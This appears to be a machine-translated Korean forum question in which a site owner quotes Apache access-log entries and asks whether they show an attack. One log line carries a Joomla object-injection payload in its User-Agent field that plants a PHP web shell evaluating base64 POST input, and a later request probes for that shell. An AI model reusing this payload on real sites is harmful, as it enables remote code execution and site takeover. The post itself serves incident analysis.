내 사이트의 Apache 액세스 로그 항목은 일반적으로 다음과 같습니다.
207.46.13.174--[31 / Oct / 2016 : 10 : 18 : 55 +0100] "GET / contact HTTP / 1.1"200256 "-" "Mozilla / 5.0 (호환; bingbot / 2.0; + http : // www .bing.com / bingbot.htm) "0.607 MISS 10.10.36.125:104 0.607
거기에서 사용자 에이전트 필드를 볼 수 있습니다. 그러나 오늘 나는 또한 다음과 같이 사용되는 사용자 에이전트 필드를 발견했습니다.
62.210.162.42--[31 / Oct / 2016 : 11 : 24 : 19 +0100] "GET / HTTP / 1.1"200 399 "-" "} __ test | O : 21 :"JDatabaseDriverMysqli ": 3 : {s : 2 : "fc"; O : 17 : "JSimplepieFactory": 0 : {} s : 21 : "\ 0 \ 0 \ 0disconnectHandlers"; a : 1 : {i : 0; a : 2 : {i : 0; O : 9 : "SimplePie": 5 : {s : 8 : "sanitize"; O : 20 : "JDatabaseDriverMysql": 0 : {} s : 8 : "feed_url"; s : 242 : "file_put_contents ($ _ SERVER ["DOCUMENT_ROOT " ] .chr (47). "sqlconfigbak.php", "| = | \ x3C".chr (63). "php \ x24mujj = \ x24_POST [ 'z']; if (\ x24mujj! = '') {\ x24xsser = base64_decode (\ x24_POST [ 'z0']); @ eval (\ "\\\ x24safedg = \ x24xsser; \");} "); JFactory :: getConfig (); 종료;"; s : 19 : " cache_name_function "; s : 6 :"assert "; s : 5 :"cache "; b : 1; s : 11 :"cache_class "; O : 20 :"JDatabaseDriverMysql ": 0 : {}} i : 1; s : 4 :"init ";}} : 13 :"\ 0 \ 0 \ 0connection "; b : 1;} ~ Ů"0.304 BYPASS 10.10.36.125:104 0.304
이것이 공격입니까? 다음 로그 항목이 sqlconfigbak.php스크립트에 언급 된 파일 (코드 200)을 성공적으로 검색 한 것으로 보입니다 . 파일 시스템에서 파일을 찾을 수 없지만 :
62.210.162.42--[31 / Oct / 2016 : 11 : 24 : 20 +0100] "GET //sqlconfigbak.php HTTP / 1.1"200 399 "http://www.googlebot.com/bot.html" "Mozilla /5.0 (호환; Googlebot / 2.1; + http : //www.google.com/bot.html) "0.244 BYPASS 10.10.36.125:104 0.244
여기서 무슨 일이 있었습니까?